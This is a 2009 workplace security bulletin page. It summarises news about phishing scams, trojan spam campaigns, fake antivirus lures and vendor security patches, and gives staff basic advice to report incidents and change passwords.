    However, despite 3.6's current availability, Mozilla's Patrick Finch has since clarified that the "beta programme for Firefox 3.6 has not yet launched", detailing that the version available on the companies servers is just a "test build".

    One such feature, although promised for version 3.6, which is lacking from this test build is the recently announced orientation detection.

    This new feature gives Firefox the power, when available, to detect the orientation of a device and change the position of the on-screen data

    You can download the test build of the Firefox 3.6 Beta now, and according to some reports you may see an overall improvement in performance of up to 23%.

    To download the new version or for a list of improvements included, please see full article. -By Chris Brandrick

    Twitter Phishing Scam Spreading via Tweets and DMs

    From Mashable social media guide: It looks like a Twitter phishing scam that we reported on last month has re-emerged today.

    This morning, I was greeted by a direct message saying youre on this vid with a link.

    Still groggy, I clicked it, and quickly realized it was likely a phishing scam.

    And, it most definitely is, as Twitter search reveals lots of users spreading the same message presumably after logging in on the phishing site and others tweeting about receiving the same DM that I did.

    The site in question looks just like Twitter, but a quick look at the address bar reveals it clearly is not

    If you have fallen for this scam, notify your service desk immediately and change your passwords. -by donna

    Bulletins posted 10/14/2009

    Bredolab Trojan surges to new heights

    Security administrators are being warned of a huge surge in incidents of the Bredolab Trojan, which could allow hackers to gain complete remote control of an organisation's PCs.

    Researchers at hosted security firm MessageLabs said that the Trojan, which is being sent out by the Cutwail botnet,

    has reached its highest ever levels, and now accounts for 3.5 per cent of all spam and 5.6 per cent of all malware intercepted each day.

    MessageLabs, which is now part of Symantec, said that so far in October around 3.6 billion Bredolab malware emails are likely to be in circulation globally each day.

    The Trojan is likely to appear in a zip file attachment to an unsolicited email with a subject line referring to postal tracking numbers, said the firm.

    The email prompts the recipient to open and run the attachment, which automatically installs the Trojan.

    "By nature, once this Trojan is on a system, it is unlikely to be detected and will allow the controller to do whatever they wish with the infected machine,

    such as installing other malware and spyware," said MessageLabs senior analyst Paul Wood.

    Watch out for any attachments you recive in your email. If you have fallen for this scam, notify your service desk immediately and change your passwords. -By Phil Muncaster

    Software Piracy Increasingly Leading To Malware Infection, Study Says

    More than 40 percent of software on PCs is pirated, Business Software Alliance reports.

    Some 41 percent of software on PCs is pirated, according to a study published last week by the Business Software Alliance (BSA).

    But pirated software isn't just illegal -- it could be dangerous to your machines, the BSA warns.

    Many users are downloading software illegally via peer-to-peer (P2P) networks and auction sites, according to the BSA report.

    But these download methods can lead to malware and identity theft, the report warns.

    The report draws correlations between Internet piracy and the spread of malware such as viruses, trojans, and spyware, which often exploit vulnerabilities in illegal -- and unpatched -- software.

    Although the correlation is not universal, geographies with high instances of software piracy also suffer from high instances of malware, the report says.

    "Pirated software can be a breeding ground for malware and can also open users up to crimes such as identity theft," says Jenny Blank senior director of legal affairs at the BSA.

    Beware of downloading softwear from an unlicensed source. If you have fallen for this scam, notify your service desk immediately and change your passwords.

    DarkReading -By Tim Wilson

    AVG upgrades free security tool to scan shortened URLs

    LinkScanner checks shortened URLs in real time and blocks users from visiting infected Web pages.

    AVG has added a feature to its LinkScanner Web security product that scans shortened URLs, which can often blindly lead users into a malicious software attack.

    LinkScanner, which AVG launched as a free product in April, performs real-time scanning of Web pages as users browse and blocks those pages that may have been rigged to exploit a software vulnerability.

    But the short URLs pose a particular danger since there's no way to tell in the browser window where the link leads.

    Twitter as well as other social networking sites have seen malicious shortened URLs proliferate.

    For more information or for a link to the Free download, please see full article .

    NetworkWorld -By Jeremy Kirk

    MJs New Song Leaked Triggers Spam Attacks

    Michael Jackson's new song "This Is It" premiered on at midnight on October 12 where fans can listen to it for free.

    But apparently a 45-second preview of the song leaked onto YouTube the day before.

    The spam below has been making rounds to trick folks into accessing the link included in the email to listen to the preview

    (obviously its not a real email from CNN nor is the ad a real ad from GAP!).

    Once the user clicks on the link, the browser opens a page on a site that's believed to be compromised and refreshes to the another site, which appears to be hacked as well, to execute a .hta file that is detected as Downloader.Psyme.

    Once the .hta file is executed, a file called AutoCfg.exe (detected as Backdoor.Trojan by Symantec) and legitimate files Servmess.dll, Autoexnt.exe, and Instexnt.exe are downloaded.

    These legitimate files are normally used for administrator purposes, but in this case the malware uses them to run after every reboot even if there is no one logged on the computer.

    At this point, the computer can be remotely controlled and all the information on it is in the hands of the criminals.

    To veiw a screen shot of this email, please see full article . If you have fallen for this scam, notify your service desk immediately and change your passwords.

    Symantec Connect -By Joji Hamada

    Twitter launches tool for nailing spammers

    Twitter added a tool that lets users flag accounts of spammers at the globally-popular microblogging service.

    Hitting a "Report as spam" button newly added to the Action section of Twitter pages alerts Twitter's safety team to check out what, if anything, should be done about a purportedly abusive profile.

    "Folks can now help us conquer spam by calling our attention to a profile they find questionable," Jenna Dawn of Twitter said in a blog post.

    For more information or to access the link about the "Report as spam" button please see full article. -By jennadawn

    Show Me the Malware!

    To help protect users against malware threats, Google has built automated scanners that detect malware on websites we've indexed.

    Pages that are identified as dangerous by these scanners are accompanied by warnings in Google search results, and browsers such as

    Google Chrome, Firefox, and Safari also use our data to show similar warnings to people attempting to visit suspicious sites.

    We're happy to announce that we've launched a feature that enables Google to provide even more detailed help to webmasters.

    Webmaster Tools now provides webmasters with samples of the malicious code that Google's automated scanners detected on their sites.

    These samples - which typically take the form of injected HTML tags, JavaScript, or embedded Flash files - are available in the "Malware details" Labs feature in Webmaster Tools.

    Registered webmasters (registration is free) of infected sites do not need to specially enable the feature - they will find links to it on the Webmaster Tools dashboard.

    Webmasters will see a list of their pages that we found to be involved in malware distribution and samples of the malicious content that Google's scanners encountered on each infected page.

    In certain situations we can identify the underlying cause of the malicious code, and we'll provide these details when possible.

    We hope that the additional information will assist webmasters and help prevent their visitors from being exposed to malware.

    For more information or to see screen shots of "Malware Details" please see full article.

    Google Blog -By Lucas Ballard

    Bulletins posted 10/13/2009

    Microsoft addresses critical SMBv2 flaw, fixes record number of flaws

    Microsoft issued 13 security bulletins Tuesday, eight of them critical, addressing zero-day flaws in Microsoft Service Message Block (SMB). Microsoft's regular update cycle fixed a record 34 vulnerabilities in Windows, Internet Explorer and Microsoft Office.

    Security experts warned that users should work to get the SMB and IIS patches implemented immediately because attackers have already have had access to the exploit code.

    In September exploit code surfaced on several websites targeting vulnerabilities in both the SMB and IIS and Microsoft issued an advisory recommending users deploy a workaround while its engineers produced and tested a fix.

    Josh Phillips, a virus researcher at Kaspersky Lab called the SMB vulnerabilities the most alarming of the bulletins released Tuesday. In a statement, Phillips said the flaws were introduced as part of a Microsoft patch issued in 2007.

    In addition, the bulletins issued by Microsoft contained the first ever security update for the release-to-manufacturing version of Windows 7, addressing ActiveX control issues as a result of components built using a flawed version of Microsoft Active Template Library.

    For a full list of information of all the Microsoft updates please see full article. -By Robert Westervelt

    Adobe released Security Bulletin to update Adobe Reader and Acrobat to v9.2 and v8.1.7. Older version ends support on Dec. 28, 2009.

    Adobe released a new version of Adobe Reader and Acrobat to fix the security issue mentioned in their security bulletin today.

    Today a Security Bulletin has been posted in regards to the second quarterly security update for Adobe Reader and Acrobat.

    The update addresses critical security issues in the products; Adobe recommends that users apply the update for their product installations

    Please note that with support for Adobe Reader 7.X and Acrobat 7.X ending in December 2009, this is the last scheduled update planned for Adobe Reader 7.X and Acrobat 7.X.

    The Adobe Reader and Acrobat 9.2 and 8.1.7 updates will include a new update and deployment tool, initially shipping in a passive, beta state, which will be functional for Acrobat and Adobe Reader customers in the near future, as well as two new changes in security user interface and control.

    If you are using an older version of Adobe Reader or Acrobat update your computer before December 28, 2009. -By donna

    Bulletins posted 10/12/2009

    New versions of Adobe Reader, Acrobat to arrive Tuesday

    As part of its second-ever quarterly security update, Adobe on Tuesday plans to release new versions of Reader and Acrobat to address a number of flaws, including one that is being exploited in live attacks.

    Adobe is set to distribute Reader and Acrobat versions 9.1.3 and 8.1.6 for Windows, Mac and UNIX, and version 7.1.3 for Windows and Mac. The updates, to coincide with Microsoft's monthly patch release, will plug a number of vulnerabilities, including a critical bug present in version 9.1.3 that is being leveraged in targeted but limited in-the-wild attacks.

    Users can protect themselves from an exploit by enabling Data Execution Prevention (DEP), a Vista security feature that prevents an application from executing code in certain memory regions, or by disabling JavaScript, according to an Adobe bulletin released Thursday.

    The patches are being distributed four times a year, coincident with at least four of the same days that Microsoft pushes out its fixes.

    Be on the look out for this update on October 13th.For more information please see full article. -By Dan Kaplan

    Microsoft readies bumper update

    Microsoft will issue its biggest ever security update on 13 October.

    The update will include 13 bulletins that between them tackle 34 vulnerabilities.

    Microsoft said that eight of the bulletins were rated as critical - the most serious sort of vulnerability.

    The security patches will close loopholes in many different programs including different editions of Windows, Internet Explorer and some elements of Office.

    Most people will get the updates automatically but links to download them can also be found on Microsoft's security pages. Once applied to a PC, the machine will need to be re-started before the fixes take effect.

    Microsoft typically issues its updates on the second Tuesday of every month. It started this regular monthly update system in late 2003.

    Be on the look out for this update on October 13th. If you are using a Microsoft OS and the updates are not automatically downloaded then go to the Microsoft security page to do a start the update.

    Google patches Android DoS vulnerabilities

    Google has shipped a new version of the Android open-source mobile phone platform to fix a pair of security flaws that could lead to denial-of-service attacks.

    According to an advisory from oCERT, a group that handles vulnerability disclosure for open-source projects, the flaws could allow hackers to render Android-powered devices useless.

    The phone application silently restarts without user awareness, this leads to a temporary loss of connectivity (as well as dropping of current calls, if any) which can be prolonged in case the phone SIM is protected by PIN, due to required PIN re-entry and the need for user attention.

    Triggering this bug (repeatedly in case no PIN is present) is considered a remote DoS condition.

    And the second bug:

    A specific malicious application can be crafted so that if it is downloaded and executed by the user, it would trigger the vulnerable API function and restart the system process. The same condition could occur if a developer unintentionally places the vulnerable function in a place where the execution path leads to that function call. Triggering this bug is considered a DoS condition.

    The vulnerabilities affect Android 1.5. Patches have been released by Google. Download the patch as soon as possible. - By Ryan Naraine

    Bulletins posted 10/08/2009

    Yet Another Good National Cyber Security Awareness Month Resource - USA Today

    Still another great National Cyber Security Awareness Month information security resource from USA Today - a great website with education, stories and lots of links to more information.

    Another great site to check out and pass it on to your friends and relations.

    USA Today Technology Cyber Security Education page.

    Bulletins posted 10/07/2009

    Another Good National Cyber Security Awareness Month Resource - Training

    As noted before, this month is National Cyber Security Awareness Month and I just found out about an excellent information security training that is free for the month of October.

    Take a look at this site and pass it on to your friends and relations (I've tested this link and training and they are safe and well presented):

    SCIPP Security Awareness Training

    Tens Of Thousands Of Email Usernames And Passwords Posted Online By Phishers

    Hotmail, Gmail, Yahoo, and other email users' accounts exposed

    Lists containing tens of thousands of stolen email account usernames and passwords have shown up online during the past few days in what researchers say likely came out of multiple phishing attacks.

    Most of the accounts were from Microsoft's Hotmail, but Google's Gmail, Yahoo, Comcast, and Earthlink accounts also showed up on lists posted on, a site typically used for developers to share code. Neowin reported yesterday that 10,000 or so Hotmail account details were posted online on October 1, and since then, several other lists were discovered that include email accounts from Gmail and the other providers.

    Microsoft and Google both confirmed some of the account information is legitimate, and that the information was likely stolen via phishing scams, not breaches of their mail systems. Just how those phishing scams were executed is unknown so far.

    We highly recommend that anyone with a Gmail, Hotmail, or Yahoo account change your passwords immediately. Since Gmail passwords can also give access to other Google applications, be sure to change those passwords as well. It is always safest if you change your online passwords on a regular basis just to avoid compromise from these types of scams.

    Dark Reading By Kelly Jackson Higgins

    Philippines Floods batters Search Engine with Fake AV

    The Fake AV Gang is now taking advantage of the recent disasters in the Philippines. The Philippines has been hit with Typhoon Ketsana (Ondoy) followed by the Typhoon Parma (Pepeng), which has brought serious flooding in the Philippines.

    Searching for the key words philippines-flood-2009 on Google and Yahoo Search Engine gives several top hits that are linked to fake alert messages warning that your computer needs to install antivirus software

    No matter what you click on these warnings you will be taken to a fake malware scanning page that will report fake infections and download an executable that is itself a trojan.

    You can always expect any news item to generate these types of scams - either using search engines like this one, or sending out SPAM email or even using pop-ups. If you hit one of these fake AV sites, you need to shut down your Internet browser immediately.

    Authentium Virus Blog

    FBI Warns of three fake emails

    The FBI has released a bulletin outlining three fraudulent emails that have been circulating recently purporting to come from the FBI.

    The first contains the subject line New DHS Report and has been circulating since August 15, 2009. The e-mails claim to be from the Department of Homeland Security (DHS) and the FBI Counterterrorism Division. The e-mail text contains information about New Usama Bin Ladin Speech Directed to the People of Europe, and has an attachment titled audio.exe. The attachment is purportedly an audio speech from Bin Ladin; however, it actually contains malicious software intended to steal information from the recipients system.

    The second fraudulent e-mail, initially appearing around June 16, 2009, claims to contain a confidential FBI report from the FBI Weapons of Mass Destruction Directorate. The subject line of the email is RE: Weapons of Mass Destruction Directorate, and contains an attachment reports.exe. This message and similar messages may contain a file related to the W32.Waledac trojan software, which is designed to steal user authentication credentials or send spam messages.

    Finally, a fraudulent e-mail message claiming to contain a confidential FBI report titled New Patterns in Al-Qaeda Financing has been circulating since August 15, 2009. The e-mail has the subject line Intelligence Bulletin No. 267, and contains an attachment titled bulletin.exe. This message, or similar messages, may contain files that are harmful to the recipients system and may try to steal user credentials.

    Never click on any links in these types of emails, they are all hoaxes and dangerous. The FBI does not send unsolicited e-mails or email official reports. Consumers should not respond to any unsolicited e-mails or click on any embedded links, as they may contain viruses or other malicious software.

    FBI - New E-scams and Warnings

    Bulletins posted 10/06/2009

    VMware Fusion update fixes two holes

    An update for VMware's Fusion software has patched two vulnerabilities that could allow a hacker to control or crash a user's computer.

    Fusion allows VMware customers to run Windows applications on Intel-based Macs. The flaws affect all versions of the software running on Mac OS X prior to and including 2.0.5.

    An attacker does not need administrative privileges to target these security holes.

    VMware advised customers running the software on Mac OS X to download Fusion version 2.0.6 from VMware downloads. Customers may be entitled to a 12-month free subscription to McAfee VirusScan Plus 2009, depending on their version of Fusion. They should review their product release notes to verify whether they can get the free subscription, according to the advisory.

    ZDNet Asia - By Tom Espiner

    Scareware scams spill onto Skype

    Scareware spreaders have started to use Skype to spread their cash-sapping crud.

    The VoIP channel has joined malicious manipulated search results, malicious online advertisements, Facebook messages and iFrame contaminated sites as a means to spread rogue "anti-virus" software scans.

    Sean-Paul Correll, a security researcher a Panda Security, explains that under its latest guise, scareware scams appear as spam messages sent to personal Skype accounts.

    The message poses as originating from an account called "Online Notification" and claims to have discovered infection on a supposedly compromised PC. Once the prospective mark visits the linked site for "more information", a fake antivirus scan takes place that warns a system is crawling with malware in a bid to coerce potentially alarmed users into buying a clean-up utility of no value.

    This scam is everywhere now - so be aware and don't fall for it.

    The Register By John Leyden

    Bulletins posted 10/05/2009

    October is National Cyber Security Awareness Month

    This month is National Cyber Security Awareness Month and I wanted to provide some links to some great information provided by the FBI to help you stay safe.

    Please take the time to read and pass along the following excellent documents (I know I always tell you not to click on links, but I've tested all of these and they are safe):

    TweetBot Spamming Ads And Other Junk

    What appears to be a botnet is using Twitter to spam advertising and other trash.

    In the past day or two large numbers of users are tweeting the error message "File server blew up over the weekend. Over 1000 SQL backup job failures in the inbox this morning."

    Click through to the users who are tweeting this and you can see other suspicious messages, like "I recommend[removed] where you can compare the top 10 web hosting services. All include a free domain k" and "Do NOT Pay For White Teeth! Learn the trick discovered by a mom to turn yellow teeth white for $5. n"

    Not all the messages have links in them. This may just be an error on the bot's part.

    Be on the lookout for suspicious tweets like these and don't follow links indiscriminately.

    PC Magazine Blogs - Security Watch By Larry Seltzer

    RIM plugs BlackBerry phishing hole

    Research in Motion (RIM) has shipped a fix for a serious security vulnerability that exposes BlackBerry users to phishing attacks.

    The flaw allows malicious hackers to trick BlackBerry device users into connecting to an attacker-controlled Web site, RIM warned in an advisory.

    BlackBerry users are urged to download and apply the patch the BlackBerry Device Software as soon as possible.

    In the meantime, RIM recommends that BlackBerry device users exercise caution when clicking on links that they receive in email or SMS messages.

    If a user visits a site that causes a BlackBerry Browser dialog box to warn the user about continuing the connection, the user should select Close connection, the company said.

    ZDNet Zero Day By Ryan Naraine

    Bulletins posted 9/29/2009

    Microsoft Gives Out Free PC Security

    Microsoft has launched a new free anti-malware tool called Microsoft Security Essentials.

    The service is designed to protect consumers from viruses, spyware, and other malicious software.

    The service has two very strong elements going for it. For one, it is from Microsoft, and secondly, it's free.

    Microsoft says Security Essentials is designed to run quietly in the background on PCs, and alert users only when there is an action for them to take.

    The company also says it limits CPU and memory usage, so there is less of an impact on everyday performance.

    They say this is even true on older or less-powerful PCs.

    The product takes advantage of "real-time protection," and is the first Microsoft security product to make use of the company's new Dynamic Signature Service.

    This is a technology that is said to help ensure users stay protected by the most current virus definitions available without having to wait for the next scheduled download.

    Here are the requirements:

    - Operating System: Genuine Windows XP (Service Pack 2 or Service Pack 3); Windows Vista (Gold, Service Pack 1, or Service Pack 2); Windows 7

    - 140 MB of available hard disk space.

    - An Internet connection is required for installation and to download the latest virus and spyware definitions for Microsoft Security Essentials.

    - Internet Browser: Windows Internet Explorer 6.0 or later or Mozilla Firefox 2.0 or later.

    For full list of requirements or to compare your current security program to this one please see full article., By Chris Crum

    Phishing for Facebook

    Landing on " cc" which appears in the URL as kiano-180809. com will redirect to an IP address that tries to mimic a Facebook page.

    Complete with a bogus Flash player upgrade, will as the page opens automatically download a malicious file that includes:

    516 trojan(s), 352 worm(s), 71 exploit(s).

    Successful infection resulted in an average of 41 new process(es) on the target machine

    Watch out for anything that automatically downloads while using Facebook. If you have fallen for this scam, notify your service desk immediately.


    Bulletins posted 9/28/2009

    Malicious Code Spreading via IRS Scam

    Reports of malicious code circulating via spam email messages related to the IRS.

    The attacks arrive via an unsolicited email message and may contain a subject line of "Notice of Underreported Income."

    These messages may contain a link or attachment. If users click on this link or open the attachment, they may be infected with malicious code, including the Zeus Trojan.

    Do not follow unsolicited web links or attachments in email messages. If you have fallen for this scam, notify your service desk immediately and change your passwords.

    SC Magazine, by Angela Moscaritolo

    Last Updated: October 22, 2009
    Website Contact: David Matthews